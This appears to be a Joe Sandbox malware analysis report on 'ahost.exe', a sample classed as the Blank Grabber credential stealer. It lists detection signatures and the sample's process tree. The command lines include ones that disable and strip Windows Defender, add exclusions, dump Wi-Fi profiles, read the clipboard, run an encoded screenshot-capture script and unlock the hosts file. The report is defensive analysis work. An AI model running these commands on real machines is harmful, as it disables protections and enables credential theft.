Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ahost.exe

Overview

General Information

Sample name:ahost.exe
Analysis ID:1574323
MD5:b5fc1d627d4db7ee46dc0fe38ac28d01
SHA1:35e2fa322989afa985734caa7c663510de21a2cc
SHA256:0f145a4d00566964b14e9b825779fd1aae1ea308a36e9d3536534779e19d64a1
Tags:exegithub-com--hombozuser-JAMESWT_MHT
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ahost.exe (PID: 7272 cmdline: "C:\Users\user\Desktop\ahost.exe" MD5: B5FC1D627D4DB7EE46DC0FE38AC28D01)
    • ahost.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\ahost.exe" MD5: B5FC1D627D4DB7EE46DC0FE38AC28D01)
      • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7608 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7392 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7600 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 5732 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7408 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7572 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7616 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7776 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8032 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 8168 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 5760 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3616 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7228 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 2656 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 872 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 356 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 2240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 740 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 2508 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 3968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1292 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7316 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7312 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7444 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7292 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8032 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7668 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7988 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7656 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 6620 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 7612 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2844 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7440 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 2572 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ohbt5slp\ohbt5slp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 4700 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46FF.tmp" "c:\Users\user\AppData\Local\Temp\ohbt5slp\CSC3D7213846C3143A1A5A1261A2A30979.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 2656 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
